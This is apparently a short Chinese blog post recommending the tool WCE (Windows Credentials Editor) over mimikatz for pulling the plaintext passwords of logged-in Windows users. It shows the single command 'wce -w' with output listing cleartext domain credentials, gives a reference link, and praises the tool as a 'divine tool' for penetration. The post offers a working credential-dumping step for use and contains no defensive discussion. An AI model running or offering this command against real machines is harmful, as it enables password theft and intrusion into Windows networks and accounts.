前段时间mimikatz热传,主要是因为可以直接提取当前登录用户明文密码。
其实,有个更厉害的神器,无需那么多命令操作,一个命令搞定:
C:\>wce -w
WCE v1.3beta (Windows Credentials Editor) - (c) 2010,2011,2012 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity com)
Use -h for help.
test\MYDOMAIN:mypass1234
NETWORK SERVICE\WORKGROUP:test
参考:http://www.ampliasecurity.com/research/wcefaq.html
真是渗透的神器